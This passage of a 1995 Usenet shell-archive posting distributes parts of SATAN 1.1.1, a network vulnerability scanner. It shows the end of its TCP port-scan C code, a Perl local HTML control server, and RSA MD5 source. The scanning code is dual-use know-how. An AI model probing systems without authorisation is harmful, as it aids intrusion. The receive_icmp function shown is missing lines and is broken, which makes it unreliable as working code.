X } else { /* cp[0] != IAC */
X bp->count++;
X }
X }
X return (count);
X}
X
X/* report_and_drop_socket - report what we know about this service */
X
Xreport_and_drop_socket(sock, err)
Xint sock;
Xint err;
X{
X alarm(0);
X
X if (show_all || want_err == err || (want_err < 0 && want_err != ~err)) {
X struct servent *sp;
X int port = socket_to_port[sock];
X
X printf("%d:%s:", port, (sp = getservbyport(htons(port), "tcp")) != 0 ?
X sp->s_name : "UNKNOWN");
X if (banner_info) {
X BANNER_INFO *bp = banner_info + sock;
X
X if (bp->flags & F_TELNET)
X putchar('t');
X putchar(':');
X if (bp->count > 0)
X print_data(stdout, bp->buf, bp->count);
X }

X if (err && show_all)
X printf("%s", strerror(err));
X printf("\n");
X fflush(stdout);
X }

X drop_socket(sock);
X}
X
X/* add_socket - say this socket is being connected */
X
Xadd_socket(sock, port)
Xint sock;
Xint port;
X{
X BANNER_INFO *bp;
X
X socket_to_port[sock] = port;
X if (banner_info) {
X bp = banner_info + sock;
X bp->count = 0;
X bp->buf = 0;
X bp->flags = 0;
X }
X FD_SET(sock, &write_socket_mask);
X if (sock > max_sock)
X max_sock = sock;
X ports_busy++;
X}
X
X/* drop_socket - release socket resources */
X
Xdrop_socket(sock)
Xint sock;
X{
X BANNER_INFO *bp;
X
X if (banner_info && (bp = banner_info + sock)->buf)
X free((char *) bp->buf);
X close(sock);
X FD_CLR(sock, &read_socket_mask);
X FD_CLR(sock, &write_socket_mask);
X ports_busy--;
X ports_done++;
X}
X
X/* time_since_read - how long since read() completed? */
X
Xtime_since_read(sock)
Xint sock;
X{
X BANNER_INFO *bp = banner_info + sock;
X
X return (bp->count == 0 ? 0 : time_since(bp->read_time));
X}
X
X/* time_since_connect - how long since connect() completed? */
X
Xtime_since_connect(sock)
Xint sock;
X{
X BANNER_INFO *bp = banner_info + sock;
X
X return (time_since(bp->connect_time));

X}
X
X/* receive_icmp - receive and decode ICMP message */
X
Xreceive_icmp(sock)
Xint sock;
X{
X union {
X char chars[BUFSIZ];
X struct ip ip;
X } buf;
X int data_len;
X int hdr_len;
X struct ip *ip;
X struct icmp *icmp;

X struct tcphdr *tcp;
X int port;

X * Extract the offending IP packet header.

X */
X if (data_len < offsetof(struct icmp, icmp_ip) + sizeof(icmp->icmp_ip)) {
X remark("short IP header in ICMP");
X return;
X }
X ip = &(icmp->icmp_ip);

X if (ip->ip_p != IPPROTO_TCP)

X return;
X if (ip->ip_dst.s_addr != sin.sin_addr.s_addr)
X return;
X
X /*

X * Extract the offending TCP packet header.

X */
X hdr_len = ip->ip_hl << 2;

X tcp = (struct tcphdr *) ((char *) ip + hdr_len);
X data_len -= hdr_len;
X if (data_len < offsetof(struct tcphdr, th_dport) + sizeof(tcp->th_dport)) {
X remark("short TCP header in ICMP");

X return;
X }
X
X /*
X * Process ICMP subcodes.
X */
X switch (icmp->icmp_code) {
X case ICMP_UNREACH_NET:

X case ICMP_UNREACH_PROTOCOL:
X /* error("error: network or protocol unreachable"); */

X /* NOTREACHED */
X case ICMP_UNREACH_PORT:

X case ICMP_UNREACH_HOST:
X port = ntohs(tcp->th_dport);
X for (sock = 0; sock < open_file_limit; sock++)
X if (socket_to_port[sock] == port) {
X report_and_drop_socket(sock, EHOSTUNREACH);
X return;
X }

X break;
X }
X}
X

X/* do_send_string - send the send string */
X
Xdo_send_string(sock)
Xint sock;
X{
X char buf[BUFSIZ];
X char *cp = buf;
X char ch;
X int c;
X int i;
X char *s = send_string;
X
X while (*s && cp < buf + sizeof(buf) - 1) { /* don't overflow the buffer */
X
X if (*s != '\\') { /* ordinary character */
X *cp++ = *s++;
X } else if (isdigit(*++s) && *s < '8') { /* \nnn octal code */
X sscanf(s, "%3o", &c);
X *cp++ = c;
X for (i = 0; i < 3 && isdigit(*s) && *s < '8'; i++)
X s++;
X } else if ((ch = *s++) == 0) { /* at string terminator */
X break;
X } else if (ch == 'b') { /* \b becomes backspace */
X *cp++ = '\b';
X } else if (ch == 'f') { /* \f becomes formfeed */
X *cp++ = '\f';
X } else if (ch == 'n') { /* \n becomes newline */
X *cp++ = '\n';
X } else if (ch == 'r') { /* \r becomes carriage ret */
X *cp++ = '\r';
X } else if (ch == 's') { /* \s becomes blank */
X *cp++ = ' ';
X } else if (ch == 't') { /* \t becomes tab */
X *cp++ = '\t';
X } else { /* \any becomes any */
X *cp++ = ch;
X }
X }
X write(sock, buf, cp - buf);
X}
END_OF_FILE
if test 14083 -ne `wc -c <'satan-1.1.1/src/port_scan/tcp_scan.c'`; then
echo shar: \"'satan-1.1.1/src/port_scan/tcp_scan.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/port_scan/tcp_scan.c'
fi
echo shar: End of archive 5 $of 15$.
cp /dev/null ark5isdone

Wietse Venema

unread,

Apr 13, 1995, 3:00:00 AM4/13/95

Submitted-by: wswi...@wsbs06.win.tue.nl (Wietse Venema)
Posting-number: Volume 47, Issue 130
Archive-name: satan/part06

Environment: UNIX && HTML && Perl 5.0

#! /bin/sh

# This is a shell archive. Remove anything before this line, then feed it
# into a shell via "sh file" or similar. To overwrite existing files,
# type "sh file -c".

# Contents: satan-1.1.1/config/version.pl satan-1.1.1/perl/html.pl
# satan-1.1.1/src/misc/md5c.c satan-1.1.1/src/rpcgen/README
# satan-1.1.1/src/rpcgen/rpc_main.c
# satan-1.1.1/src/rpcgen/rpc_scan.c satan-1.1.1/src/yp-chk/yp.x
# Wrapped by kent@ftp on Wed Apr 12 20:30:09 1995

PATH=/bin:/usr/bin:/usr/ucb:/usr/local/bin:/usr/lbin:$PATH ; export PATH
echo If this archive is complete, you will see the following message:

echo ' "shar: End of archive 6 (of 15)."'
if test -f 'satan-1.1.1/config/version.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/config/version.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/config/version.pl'\" $69 characters$
sed "s/^X//" >'satan-1.1.1/config/version.pl' <<'END_OF_FILE'
X#
X# current version of SATAN
X#
X$satan_version = "Version 1.1.1";
X
X1;
END_OF_FILE
if test 69 -ne `wc -c <'satan-1.1.1/config/version.pl'`; then
echo shar: \"'satan-1.1.1/config/version.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/config/version.pl'
fi
if test -f 'satan-1.1.1/perl/html.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/html.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/html.pl'\" $10372 characters$
sed "s/^X//" >'satan-1.1.1/perl/html.pl' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X#
X# version 1, Thu Mar 23 21:53:31 1995, last mod by wietse
X#
X
X#
X# Run an off-the-shelf HTML client against a dedicated HTML server. The
X# server executes PERL files that are specified in HTML requests.
X#
X# Authentication is magic-cookie style via the file system. This should
X# be good enough: the client-server conversation never goes over the
X# network so the magic cookie cannot be stolen by a network sniffer.
X#
X# Values in POST attribute-value lists are assigned to the corresponding
X# global PERL variables. See &process_html_request() for details.
X#
X
Xsub html {
X local($helper, $wd, $host);
X
X #
X # Start the HTML server and generate the initial cookie for
X # client-server authentication.
X #
X $running_from_html = 1;
X chmod 0700, <~/.mosaic*>; # Yuck!
X chmod 0700, <~/.netsca*>; # Yuck!
X chmod 0700, <~/.MCOM*>; # Yuck!
X &start_html_server();
X &make_password_seed();
X
X #
X # These strings are used in, among others, PERL-to-HTML scripts.
X #
X $wd = `pwd`;
X chop $wd;
X $html_root = "$wd/html";
X $start_page = "satan.html";
X $THIS_HOST = &getfqdn(&hostname());
X die "Can't find my own hostname: set \$dont_use_nslookup in $SATAN_CF\n"
X unless $THIS_HOST;
X $HTML_ROOT = "file://localhost$html_root";
X $HTML_SERVER = "http://$THIS_HOST:$html_port/$html_password/$html_root";
X $HTML_STARTPAGE = "$HTML_ROOT/$start_page";
X
X #
X # Some obscurity. The real security comes from magic cookies.
X #
X $html_client_addresses = find_all_addresses($THIS_HOST) ||
X die "Unable to find all my network addresses\n";
X
X for (<$html_root/*.pl>) {
X s/\.pl$//;
X unlink "$_.html";
X open(HTML, ">$_.html")
X || die "cannot write $_.html: $!\n";
X select HTML;
X do "$_.pl";
X close HTML;
X select STDOUT;
X die $@ if $@;
X }
X
X #
X # Fork off the HTML client, and fork off a server process that
X # handles requests from that client. The parent process waits
X # until the client exits and terminates the server.
X #
X print "Starting $MOSAIC...\n" if $debug;
X
X if (($client = fork()) == 0) {
X foreach (keys %ENV) {
X delete $ENV{$_} if (/proxy/i && !/no_proxy/i);
X }
X exec($MOSAIC, "$HTML_STARTPAGE")
X || die "cannot exec $MOSAIC: $!";
X }
X if (($server = fork()) == 0) {
X if (($helper = fork()) == 0) {
X alarm 3600;
X &patience();
X }
X &init_satan_data();
X &read_satan_data() unless defined($opt_i);
X kill 'TERM',$helper;
X $SIG{'PIPE'} = 'IGNORE';
X for (;;) {
X accept(CLIENT, SOCK) || die "accept: $!";
X select((select(CLIENT), $| = 1)[0]);
X &process_html_request();
X close(CLIENT);
X }
X }
X
X #
X # Wait until the client terminates, then terminate the server.
X #
X close(SOCK);
X waitpid($client, 0);
X kill('TERM', $server);
X exit;
X}
X
X#
X# Compute a hard to predict number for client-server authentication. Exploit
X# UNIX parallelism to improve unpredictability. We use MD5 only to compress
X# the result.
X#
Xsub make_password_seed {
X local($command);
X
X die "Cannot find $MD5. Did you run a \"reconfig\" and \"make\"?\n"
X unless -x "$MD5";
X $command = "ps axl&ps -el&netstat -na&netstat -s&ls -lLRt /dev*&w";
X open(SEED, "($command) 2>/dev/null | $MD5 |")
X || die "cannot run password command: $!";
X ($html_password = <SEED>) || die "password computation failed: $!";
X close(SEED);
X chop($html_password);
X}
X
X#
X# Set up a listener on an arbitrary port. There is no good reason to
X# listen on a well-known port number.
X#
Xsub start_html_server {
X local($sockaddr, $proto, $junk);
X
X $sockaddr = 'S n a4 x8';
X ($junk, $junk, $proto) = getprotobyname('tcp');
X socket(SOCK, &AF_INET, &SOCK_STREAM, $proto) || die "socket: $!";
X listen(SOCK, 1) || die "listen: $!";
X ($junk, $html_port) = unpack($sockaddr, getsockname(SOCK));
X}
X
X#
X# Process one client request. We expect the client to send stuff that
X# begins with:
X#
X# command /password/perl_script junk
X#
X# Where perl_script is the name of a perl file that is executed via
X# do "perl_script";
X#
X# In case of a POST command the values in the client's attribute-value
X# list are assigned to the corresponding global PERL variables.
X#
Xsub process_html_request {
X local($request, $command, $script, $magic, $url, $peer);
X local(%args);
X
X #
X # Parse the command and URL. Update the default file prefix.
X #
X $request = <CLIENT>;
X print $request if $debug;
X ($command, $url) = split(/\s+/, $request);
X if ($command eq "" || $command eq "QUIT") {
X return;
X }
X
X ($junk, $magic, $script) = split(/\//, $url, 3);
X ($script, $html_script_args) = split(',', $script, 2);
X ($HTML_CWD = "file:$script") =~ s/\/[^\/]*$//;
X
X #
X # Make sure they gave us the right magic number.
X #
X if ($magic ne $html_password) {
X &bad_html_magic($request);
X return;
X }
X
X #
X # Assume the password has leaked out when the following happens.
X #
X $peer = &get_peer_addr(CLIENT);
X die "SATAN password from unauthorized client: $peer\n"
X unless is_member_of($peer, $html_client_addresses);
X die "Illegal URL: $url received from: $peer\n"
X if index($script, "..") >= $[
X || index($script, "$html_root/") != $[
X || $script !~ /\.pl$/;
X
X #
X # Warn them when the browser leaks parent URLs to web servers.
X #
X while (<CLIENT>) {
X if (!$cookie_leak_warning && /$html_password/) {
X &cookie_leak_warning();
X return;
X }
X last if (/^\s+$/);
X }
X
X if ($command eq "GET") {
X perl_html_script($script);
X } elsif ($command eq "POST") {
X
X #
X # Process the attribute-value list.
X #
X if ($_ = <CLIENT>) {
X s/\s+$//;
X s/^/\n/;
X s/&/\n/g;
X $html_post_attributes = '';
X $* = 1;
X for (split(/(%[0-9][0-9A-Z])/, $_)) {
X $html_post_attributes .= (/%([0-9][0-9A-Z])/) ?
X pack('c',hex($1)) : $_;
X }
X %args = ('_junk_', split(/\n([^=]+)=/, $html_post_attributes));
X delete $args{'_junk_'};
X for (keys %args) {
X print "\$$_ = $args{$_}\n" if $debug;
X ${$_} = $args{$_};
X }
X perl_html_script($script);
X } else {
X &bad_html_form($script);
X }
X } else {
X &bad_html_command($request);
X }
X}
X
X
X#
X# Map IP to string.
X#
Xsub inet_ntoa {
X local($ip) = @_;
X local($a, $b, $c, $d);
X
X ($a, $b, $c, $d) = unpack('C4', $ip);
X return "$a.$b.$c.$d";
X}
X
X#
X# Look up peer address and translate to string form.
X#
Xsub get_peer_addr {
X local($peer) = @_;
X local($junk, $inet);
X
X ($junk, $junk, $inet) = unpack('S n a4', getpeername($peer));
X return &inet_ntoa($inet);
X}
X
X#
X# Wrong magic number.
X#
Xsub bad_html_magic {
X local($request) = @_;
X local($peer);
X
X $peer = &get_peer_addr(CLIENT);
X print STDERR "bad request from $peer: $request\n";
X
X print CLIENT <<EOF
X<HTML>
X<HEAD>
X<TITLE>Bad client authentication code</TITLE>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1>Bad client authentication code</H1>
XThe command: <TT>$request</TT> was not properly authenticated.
X</BODY>
X</HTML>
XEOF
X}
X
X#
X# Unexpected HTML command.
X#
Xsub bad_html_command {
X local($request) = @_;
X
X print CLIENT <<EOF
X<HTML>
X<HEAD>
X<TITLE>Unknown command</TITLE>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1>Unknown command</H1>
XThe command <TT>$request<TT> was not recognized.
X</BODY>
X</HTML>
XEOF
X}
X
X#
X# Execute PERL script with extreme prejudice.
X#
Xsub perl_html_script {
X local($script) = @_;
X
X if (! -e $script) {
X print CLIENT <<EOF
X<HTML>
X<HEAD>
X<TITLE>File not found</TITLE>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1>File not found</H1>
XThe file <TT>$script</TT> does not exist or is not accessible.
X</BODY>
X</HTML>
XEOF
X; return;
X }
X do $script;
X if ($@ && ($@ ne "\n")) {
X print CLIENT <<EOF
X<HTML>
X<HEAD>
X<TITLE>Command failed</TITLE>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1>Command failed</H1>
X$@
X</BODY>
X</HTML>
XEOF
X }
X}
X
X#
X# Missing attribute list
X#
Xsub bad_html_form {
X local($script) = @_;
X
X print CLIENT <<EOF
X<HTML>
X<HEAD>
X<TITLE>No attribute list</TITLE>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1>No attribute list</H1>
X
XNo attribute list was found.
X</BODY>
X</HTML>
XEOF
X}
X
X#
X# Scaffolding for stand-alone testing.
X#
Xif ($running_under_satan == 1) {
X
X require 'perl/socket.pl';
X require 'config/paths.pl';
X require 'perl/hostname.pl';
X require 'perl/getfqdn.pl';
X require 'config/satan.cf';
X
X} else {
X $running_under_satan = 1;
X
X require 'perl/socket.pl';
X require 'config/paths.pl';
X require 'perl/hostname.pl';
X require 'perl/getfqdn.pl';
X require 'config/satan.cf';
X
X &html();
X}
X
X#
X# Give them something to read while the server is initializing.
X#
Xsub patience {
X for (;;) {
X accept(CLIENT, SOCK) || die "accept: $!";
X <CLIENT>;
X print CLIENT <<EOF
X<HTML>
X<HEAD>
X<TITLE>Initialization in progress</TITLE>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1>Initialization in progress</H1>
XSATAN is initializing, please try again later.
X</BODY>
X</HTML>
XEOF
X;
X close(CLIENT);
X }
X}
X
X# Look up all IP addresses listed for this host name, so that we can
X# filter out requests from non-local clients. Doing so offers no real
X# security, because network address information can be subverted.
X#
X# All client-server communication security comes from the magic cookies
X# that are generated at program startup time. Client address filtering
X# adds an additional barrier in case the cookie somehow leaks out.
X
Xsub find_all_addresses {
X local($host) = @_;
X local($junk, $result);
X
X ($junk, $junk, $junk, $junk, @all_addresses) = gethostbyname($host);
X for (@all_addresses) { $result .= &inet_ntoa($_) . " "; }
X return $result;
X}
X
Xsub is_member_of {
X local($elem, $list) = @_;
X
X for (split(/\s+/, $list)) { return 1 if ($elem eq $_); }
X return 0;
X}
X
Xsub cookie_leak_warning {
X print CLIENT <<EOF;
X<HTML>
X<HEAD>
X<TITLE>Warning - SATAN Password Disclosure</TITLE>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC="$HTML_ROOT/images/satan.gif" ALT="[SATAN Image]">
XWarning - SATAN Password Disclosure</H1>

X
X<HR>
X
X<H3>

X
XYour Hypertext viewer may reveal confidential information when you
Xcontact remote WWW servers from within SATAN.
X
X<p>
X
XFor this reason, SATAN advises you to not contact other WWW servers
Xfrom within SATAN.
X
X<p>
X
XFor more information, see <a
Xhref="$HTML_ROOT/tutorials/vulnerability/SATAN_password_disclosure.html">the
XSATAN vulnerability tutorial</a>.
X
X<p>
X
XThis message will appear only once per SATAN session.
X
X<p>
X
XIn order to proceed, send a <i>reload</i> command (Ctrl-R with Lynx),
Xor go back to the previous screen and select the same link or button
Xagain.
X
X</H3>

X
X</BODY>
X</HTML>

XEOF
X $cookie_leak_warning = 1;
X}
X
X1;
END_OF_FILE
if test 10372 -ne `wc -c <'satan-1.1.1/perl/html.pl'`; then
echo shar: \"'satan-1.1.1/perl/html.pl'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/perl/html.pl'
# end of 'satan-1.1.1/perl/html.pl'
fi
if test -f 'satan-1.1.1/src/misc/md5c.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/misc/md5c.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/misc/md5c.c'\" $10423 characters$
sed "s/^X//" >'satan-1.1.1/src/misc/md5c.c' <<'END_OF_FILE'
X/* MD5C.C - RSA Data Security, Inc., MD5 message-digest algorithm
X */
X
X/* Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
Xrights reserved.
X
XLicense to copy and use this software is granted provided that it
Xis identified as the "RSA Data Security, Inc. MD5 Message-Digest
XAlgorithm" in all material mentioning or referencing this software
Xor this function.
X
XLicense is also granted to make and use derivative works provided
Xthat such works are identified as "derived from the RSA Data
XSecurity, Inc. MD5 Message-Digest Algorithm" in all material
Xmentioning or referencing the derived work.
X
XRSA Data Security, Inc. makes no representations concerning either
Xthe merchantability of this software or the suitability of this
Xsoftware for any particular purpose. It is provided "as is"
Xwithout express or implied warranty of any kind.
X
XThese notices must be retained in any copies of any part of this
Xdocumentation and/or software.
X */
X
X#include "global.h"
X#include "md5.h"
X
X/* Constants for MD5Transform routine.
X */
X#define S11 7
X#define S12 12
X#define S13 17
X#define S14 22
X#define S21 5
X#define S22 9
X#define S23 14
X#define S24 20
X#define S31 4
X#define S32 11
X#define S33 16
X#define S34 23
X#define S41 6
X#define S42 10
X#define S43 15
X#define S44 21
X
Xstatic void MD5Transform PROTO_LIST ((UINT4 [4], unsigned char [64]));
Xstatic void Encode PROTO_LIST
X ((unsigned char *, UINT4 *, unsigned int));
Xstatic void Decode PROTO_LIST
X ((UINT4 *, unsigned char *, unsigned int));
Xstatic void MD5_memcpy PROTO_LIST ((POINTER, POINTER, unsigned int));
Xstatic void MD5_memset PROTO_LIST ((POINTER, int, unsigned int));
X
Xstatic unsigned char PADDING[64] = {
X 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
X 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
X 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
X};
X
X/* F, G, H and I are basic MD5 functions.
X */
X#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
X#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
X#define H(x, y, z) ((x) ^ (y) ^ (z))
X#define I(x, y, z) ((y) ^ ((x) | (~z)))
X
X/* ROTATE_LEFT rotates x left n bits.
X */
X#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))
X
X/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4.
XRotation is separate from addition to prevent recomputation.
X */
X#define FF(a, b, c, d, x, s, ac) { \
X (a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
X (a) = ROTATE_LEFT ((a), (s)); \
X (a) += (b); \
X }
X#define GG(a, b, c, d, x, s, ac) { \
X (a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
X (a) = ROTATE_LEFT ((a), (s)); \
X (a) += (b); \
X }
X#define HH(a, b, c, d, x, s, ac) { \
X (a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
X (a) = ROTATE_LEFT ((a), (s)); \
X (a) += (b); \
X }
X#define II(a, b, c, d, x, s, ac) { \
X (a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
X (a) = ROTATE_LEFT ((a), (s)); \
X (a) += (b); \
X }
X
X/* MD5 initialization. Begins an MD5 operation, writing a new context.
X */
Xvoid MD5Init (context)
XMD5_CTX *context; /* context */
X{
X context->count[0] = context->count[1] = 0;
X /* Load magic initialization constants.
X*/
X context->state[0] = 0x67452301;
X context->state[1] = 0xefcdab89;
X context->state[2] = 0x98badcfe;
X context->state[3] = 0x10325476;
X}
X
X/* MD5 block update operation. Continues an MD5 message-digest
X operation, processing another message block, and updating the
X context.
X */
Xvoid MD5Update (context, input, inputLen)
XMD5_CTX *context; /* context */
Xunsigned char *input; /* input block */
Xunsigned int inputLen; /* length of input block */
X{
X unsigned int i, index, partLen;
X
X /* Compute number of bytes mod 64 */
X index = (unsigned int)((context->count[0] >> 3) & 0x3F);
X
X /* Update number of bits */
X if ((context->count[0] += ((UINT4)inputLen << 3))
X < ((UINT4)inputLen << 3))
X context->count[1]++;
X context->count[1] += ((UINT4)inputLen >> 29);
X
X partLen = 64 - index;
X
X /* Transform as many times as possible.
X*/
X if (inputLen >= partLen) {
X MD5_memcpy
X ((POINTER)&context->buffer[index], (POINTER)input, partLen);
X MD5Transform (context->state, context->buffer);
X
X for (i = partLen; i + 63 < inputLen; i += 64)
X MD5Transform (context->state, &input[i]);
X
X index = 0;
X }
X else
X i = 0;
X
X /* Buffer remaining input */
X MD5_memcpy
X ((POINTER)&context->buffer[index], (POINTER)&input[i],
X inputLen-i);
X}
X
X/* MD5 finalization. Ends an MD5 message-digest operation, writing the
X the message digest and zeroizing the context.
X */
Xvoid MD5Final (digest, context)
Xunsigned char digest[16]; /* message digest */
XMD5_CTX *context; /* context */
X{
X unsigned char bits[8];
X unsigned int index, padLen;
X
X /* Save number of bits */
X Encode (bits, context->count, 8);
X
X /* Pad out to 56 mod 64.
X*/
X index = (unsigned int)((context->count[0] >> 3) & 0x3f);
X padLen = (index < 56) ? (56 - index) : (120 - index);
X MD5Update (context, PADDING, padLen);
X
X /* Append length (before padding) */
X MD5Update (context, bits, 8);
X /* Store state in digest */
X Encode (digest, context->state, 16);
X
X /* Zeroize sensitive information.
X*/
X MD5_memset ((POINTER)context, 0, sizeof (*context));
X}
X
X/* MD5 basic transformation. Transforms state based on block.
X */
Xstatic void MD5Transform (state, block)
XUINT4 state[4];
Xunsigned char block[64];
X{
X UINT4 a = state[0], b = state[1], c = state[2], d = state[3], x[16];
X
X Decode (x, block, 64);
X
X /* Round 1 */
X FF (a, b, c, d, x[ 0], S11, 0xd76aa478); /* 1 */
X FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 */
X FF (c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */
X FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); /* 4 */
X FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); /* 5 */
X FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */
X FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */
X FF (b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 */
X FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */
X FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); /* 10 */
X FF (c, d, a, b, x[10], S13, 0xffff5bb1); /* 11 */
X FF (b, c, d, a, x[11], S14, 0x895cd7be); /* 12 */
X FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */
X FF (d, a, b, c, x[13], S12, 0xfd987193); /* 14 */
X FF (c, d, a, b, x[14], S13, 0xa679438e); /* 15 */
X FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */
X
X /* Round 2 */
X GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */
X GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */
X GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */
X GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */
X GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 21 */
X GG (d, a, b, c, x[10], S22, 0x2441453); /* 22 */
X GG (c, d, a, b, x[15], S23, 0xd8a1e681); /* 23 */
X GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); /* 24 */
X GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); /* 25 */
X GG (d, a, b, c, x[14], S22, 0xc33707d6); /* 26 */
X GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); /* 27 */
X GG (b, c, d, a, x[ 8], S24, 0x455a14ed); /* 28 */
X GG (a, b, c, d, x[13], S21, 0xa9e3e905); /* 29 */
X GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); /* 30 */
X GG (c, d, a, b, x[ 7], S23, 0x676f02d9); /* 31 */
X GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); /* 32 */
X
X /* Round 3 */
X HH (a, b, c, d, x[ 5], S31, 0xfffa3942); /* 33 */
X HH (d, a, b, c, x[ 8], S32, 0x8771f681); /* 34 */
X HH (c, d, a, b, x[11], S33, 0x6d9d6122); /* 35 */
X HH (b, c, d, a, x[14], S34, 0xfde5380c); /* 36 */
X HH (a, b, c, d, x[ 1], S31, 0xa4beea44); /* 37 */
X HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); /* 38 */
X HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); /* 39 */
X HH (b, c, d, a, x[10], S34, 0xbebfbc70); /* 40 */
X HH (a, b, c, d, x[13], S31, 0x289b7ec6); /* 41 */
X HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); /* 42 */
X HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); /* 43 */
X HH (b, c, d, a, x[ 6], S34, 0x4881d05); /* 44 */
X HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); /* 45 */
X HH (d, a, b, c, x[12], S32, 0xe6db99e5); /* 46 */
X HH (c, d, a, b, x[15], S33, 0x1fa27cf8); /* 47 */
X HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); /* 48 */
X
X /* Round 4 */
X II (a, b, c, d, x[ 0], S41, 0xf4292244); /* 49 */
X II (d, a, b, c, x[ 7], S42, 0x432aff97); /* 50 */
X II (c, d, a, b, x[14], S43, 0xab9423a7); /* 51 */
X II (b, c, d, a, x[ 5], S44, 0xfc93a039); /* 52 */
X II (a, b, c, d, x[12], S41, 0x655b59c3); /* 53 */
X II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); /* 54 */
X II (c, d, a, b, x[10], S43, 0xffeff47d); /* 55 */
X II (b, c, d, a, x[ 1], S44, 0x85845dd1); /* 56 */
X II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); /* 57 */
X II (d, a, b, c, x[15], S42, 0xfe2ce6e0); /* 58 */
X II (c, d, a, b, x[ 6], S43, 0xa3014314); /* 59 */
X II (b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */
X II (a, b, c, d, x[ 4], S41, 0xf7537e82); /* 61 */
X II (d, a, b, c, x[11], S42, 0xbd3af235); /* 62 */
X II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); /* 63 */
X II (b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */
X
X state[0] += a;
X state[1] += b;
X state[2] += c;
X state[3] += d;
X
X /* Zeroize sensitive information.
X*/
X MD5_memset ((POINTER)x, 0, sizeof (x));
X}
X
X/* Encodes input (UINT4) into output (unsigned char). Assumes len is
X a multiple of 4.
X */
Xstatic void Encode (output, input, len)
Xunsigned char *output;
XUINT4 *input;
Xunsigned int len;
X{
X unsigned int i, j;
X
X for (i = 0, j = 0; j < len; i++, j += 4) {
X output[j] = (unsigned char)(input[i] & 0xff);
X output[j+1] = (unsigned char)((input[i] >> 8) & 0xff);
X output[j+2] = (unsigned char)((input[i] >> 16) & 0xff);
X output[j+3] = (unsigned char)((input[i] >> 24) & 0xff);
X }
X}
X
X/* Decodes input (unsigned char) into output (UINT4). Assumes len is
X a multiple of 4.
X */
Xstatic void Decode (output, input, len)
XUINT4 *output;
Xunsigned char *input;
Xunsigned int len;
X{
X unsigned int i, j;
X
X for (i = 0, j = 0; j < len; i++, j += 4)
X output[i] = ((UINT4)input[j]) | (((UINT4)input[j+1]) << 8) |
X (((UINT4)input[j+2]) << 16) | (((UINT4)input[j+3]) << 24);
X}
X
X/* Note: Replace "for loop" with standard memcpy if possible.
X */
X
Xstatic void MD5_memcpy (output, input, len)
XPOINTER output;
XPOINTER input;
Xunsigned int len;
X{
X unsigned int i;
X
X for (i = 0; i < len; i++)
X output[i] = input[i];
X}
X
X/* Note: Replace "for loop" with standard memset if possible.
X */
Xstatic void MD5_memset (output, value, len)
XPOINTER output;
Xint value;
Xunsigned int len;
X{
X unsigned int i;
X
